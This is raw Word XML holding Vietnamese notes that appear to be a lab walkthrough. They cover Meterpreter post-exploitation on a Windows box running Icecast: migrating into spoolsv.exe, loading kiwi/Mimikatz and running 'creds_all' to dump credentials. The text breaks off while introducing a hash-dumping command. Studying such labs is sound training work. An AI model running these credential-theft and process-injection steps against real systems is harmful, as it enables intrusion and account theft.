          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65091CC6" wp14:editId="33918326">
            <wp:extent cx="1901897" cy="3576577"/>
            <wp:effectExtent l="0" t="0" r="317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1909646" cy="3591150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="703F1CDA" w14:textId="4042D42D" w:rsidR="00814345" w:rsidRDefault="00814345">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ED29B49" w14:textId="3A8611B3" w:rsidR="00814345" w:rsidRDefault="00814345">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nếu bạn là Session1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4461D658" w14:textId="608AC7D0" w:rsidR="00814345" w:rsidRDefault="00814345">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="472051C0" wp14:editId="4A5C2AC7">
            <wp:extent cx="3149600" cy="2921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3149600" cy="2921000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68361151" w14:textId="77777777" w:rsidR="00814345" w:rsidRDefault="00814345">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F302A4F" w14:textId="77050AB0" w:rsidR="00674F73" w:rsidRDefault="00674F73">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1778037E" w14:textId="2CA6A82F" w:rsidR="00674F73" w:rsidRPr="00814345" w:rsidRDefault="00814345">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00814345">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Looting</w:t>
      </w:r>
      <w:r w:rsidR="00846046">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (cướp bóc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0FD29A" w14:textId="51188DBC" w:rsidR="00814345" w:rsidRDefault="00814345">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36024222" w14:textId="11EAB3D5" w:rsidR="001B262D" w:rsidRDefault="001B262D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mimikatz: học cách thu thập thêm thông tin đăng nhập và bẻ khóa các hàm băm được lưu trên máy ảo</w:t>
      </w:r>
      <w:r w:rsidR="00345859">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B821FF5" w14:textId="3A10B2E0" w:rsidR="00345859" w:rsidRDefault="00345859">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DAB100C" w14:textId="3F44D2D5" w:rsidR="00345859" w:rsidRDefault="00345859">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Khai thác thành công, ta có nhiều đặc quyền hơn: SeImpersonatePrivilege</w:t>
      </w:r>
      <w:r w:rsidR="006228CC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F395C1" w14:textId="74D5A428" w:rsidR="006228CC" w:rsidRDefault="006228CC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ta c</w:t>
      </w:r>
      <w:r w:rsidR="00345859">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ó access token của </w:t>
      </w:r>
      <w:r w:rsidR="00345859" w:rsidRPr="00345859">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> n</w:t>
      </w:r>
      <w:r w:rsidR="00345859">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">hưng đang ở tiến trình có đặc quyền thấp nên phải di chuyển đến 1 tiến trình có đặc quyền cao hơn. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43078326" w14:textId="123F22F2" w:rsidR="00325B67" w:rsidRDefault="00325B67">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4491ACE1" w14:textId="77777777" w:rsidR="00325B67" w:rsidRDefault="00325B67">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Liệt kê các tiến trình đang chạy bằng lệnh ps. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DBF05E" w14:textId="77777777" w:rsidR="00325B67" w:rsidRDefault="00325B67">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B2C6519" w14:textId="46C8A097" w:rsidR="00325B67" w:rsidRDefault="00325B67">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325B67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lưu ý, ta có thể thấy các tiến trình đang chạy bởi NT AUTHORITY\SYSTEM vì có các đặc quyền để leo thang (mặc dù tiến trình của chúng ta không như vậy).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDFA4AC" w14:textId="77777777" w:rsidR="006228CC" w:rsidRDefault="006228CC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="015B4B13" w14:textId="0D7B1102" w:rsidR="00345859" w:rsidRDefault="006228CC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00325B67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a phải chọn tiến trình</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> tương tác với dịch vụ lsass, dịch vụ chịu trách nhiệm xác thực trong Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A810718" w14:textId="62F9DE03" w:rsidR="00697A4C" w:rsidRDefault="00697A4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26C6FF12" w14:textId="2A17D4ED" w:rsidR="00697A4C" w:rsidRDefault="00697A4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chọn tiến trình có cùng cấu trúc (x64), đặc quyền với lsass: dịch vụ printer spool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4827D393" w14:textId="3AEC852C" w:rsidR="00AC504B" w:rsidRDefault="00AC504B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EBDA980" w14:textId="6F5057E5" w:rsidR="00AC504B" w:rsidRDefault="00AC504B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Tên của dịch vụ máy in là: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3563EDA9" w14:textId="55A14A0E" w:rsidR="00EF3D7B" w:rsidRDefault="00EF3D7B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27A2D6E0" w14:textId="2FCD3535" w:rsidR="00EF3D7B" w:rsidRDefault="00EF3D7B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52AB3D29" wp14:editId="29ABD5FB">
            <wp:extent cx="5943600" cy="3206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5943600" cy="320675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7EF71C" w14:textId="17DAEA9B" w:rsidR="00F46F3C" w:rsidRDefault="00F46F3C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4466F27B" w14:textId="0794F7A8" w:rsidR="00F46F3C" w:rsidRDefault="00F76E6D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26209AFF" wp14:editId="5982BCE1">
            <wp:extent cx="5943600" cy="2451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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="245110"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ED9B6E" w14:textId="152B64CF" w:rsidR="00F76E6D" w:rsidRDefault="00F76E6D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CC7245A" w14:textId="22DC7DFA" w:rsidR="00F76E6D" w:rsidRDefault="00F76E6D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BBA4BB5" w14:textId="34F748DA" w:rsidR="00D0767D" w:rsidRDefault="00D0767D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DB2B4D5" w14:textId="6F824D1F" w:rsidR="00D0767D" w:rsidRDefault="00697A4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chuyển đến 1 tiến trình mới có đặc quyền cao hơn</w:t>
      </w:r>
      <w:r w:rsidR="00D0767D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Thực tế không phải là migrate. Đúng hơn là tiêm mã độc bằng cách tạo 1 luồng vào trong 1 tiến trình khác. Meterpreter làm việc này rất tốt. Nó tiêm phiên hiện tại của bạn cùng với tất cả cấu hình và tiện ích </w:t>
      </w:r>
      <w:r w:rsidR="00325B67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đã tải vào 1 luồng mới từ xa.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153AE6B1" w14:textId="0FB0DDCF" w:rsidR="00D0767D" w:rsidRDefault="00D0767D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F3A08F2" w14:textId="1DC12492" w:rsidR="00D0767D" w:rsidRDefault="00D0767D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Di chuyển đến tiến trình đó bằng lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A4AA77" w14:textId="692C5E43" w:rsidR="00D0767D" w:rsidRDefault="00D0767D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="662911AB" w14:textId="1A83017E" w:rsidR="00D0767D" w:rsidRPr="00CF6D39" w:rsidRDefault="00D0767D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF6D39">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>migrate 1</w:t>
      </w:r>
      <w:r w:rsidR="00F76E6D">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>264</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EDAAA4" w14:textId="214EE956" w:rsidR="00CF6D39" w:rsidRPr="00527735" w:rsidRDefault="00527735">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00527735">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>migrate -N spoolsv.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0ECF6E" w14:textId="7FD9B6F5" w:rsidR="00CF6D39" w:rsidRDefault="00F76E6D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E42EBF4" wp14:editId="234DC92F">
            <wp:extent cx="3429000" cy="952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3429000" cy="952500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4CDEB8" w14:textId="6A566B2A" w:rsidR="00B7247D" w:rsidRDefault="00B7247D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="105A2A3D" wp14:editId="46E9ACBE">
            <wp:extent cx="5943600" cy="4038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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="403860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7355DA13" w14:textId="3F9BFB25" w:rsidR="00C36BB0" w:rsidRDefault="00C36BB0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DFE982D" w14:textId="54CF0B42" w:rsidR="00C36BB0" w:rsidRDefault="00D6107F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chúng ta đã đạt được đặc quyền của quản trị viên, mục tiêu tiếp theo sẽ là cướp bóc.</w:t>
      </w:r>
      <w:r w:rsidR="0012132C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mimikatz là 1 công cụ phá mật khẩu khá khét tiếng. Tải nó bằng lệnh load kiwi. (Kiwi là phiên bản cập nhật của Mimikatz)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EFB46D" w14:textId="77E97E14" w:rsidR="00B7247D" w:rsidRDefault="00B7247D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5396C637" w14:textId="3BF64839" w:rsidR="00B7247D" w:rsidRPr="008D7872" w:rsidRDefault="008D7872">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Lệnh cho phép truy suất tất cả thông tin đăng nhập: </w:t>
      </w:r>
      <w:r w:rsidRPr="008D7872">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>creds_all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341862BB" w14:textId="592FFF0D" w:rsidR="00D42382" w:rsidRDefault="00D42382">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21588598" w14:textId="624A1984" w:rsidR="008D7872" w:rsidRDefault="008D7872">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="377F938E" wp14:editId="223B9183">
            <wp:extent cx="4768770" cy="3466529"/>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77697" cy="3473018"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC1CF5E" w14:textId="72FA2875" w:rsidR="008D7872" w:rsidRDefault="008D7872">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01EEFC41" w14:textId="3BD882E1" w:rsidR="008D7872" w:rsidRDefault="008D7872">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mimikatz cho phép chúng ta đánh cắp mật khẩu này khỏi bộ nhớ ngay cả khi Dark không đăng nhập vì có một scheduled task chạy Icecast với tư cách là người dùng Dark.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C21C9C7" w14:textId="3746C18B" w:rsidR="008D7872" w:rsidRDefault="008D7872">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BA333B0" w14:textId="53A795FD" w:rsidR="00BF77BA" w:rsidRPr="00BF77BA" w:rsidRDefault="00BF77BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF77BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F31F59B" w14:textId="1D2F30FA" w:rsidR="00BF77BA" w:rsidRDefault="00BF77BA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36769979" w14:textId="38E43CFF" w:rsidR="00BF77BA" w:rsidRPr="002F3A8A" w:rsidRDefault="006515D9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Lệnh cho phép chúng ta </w:t>
      </w:r>
      <w:r w:rsidR="00CC724A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">đánh cắp tất cả password hashes được lưu trữ trên hệ thống: </w:t>
      </w:r>
      <w:r w:rsidR="00CC724A" w:rsidRPr="002F3A8A">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
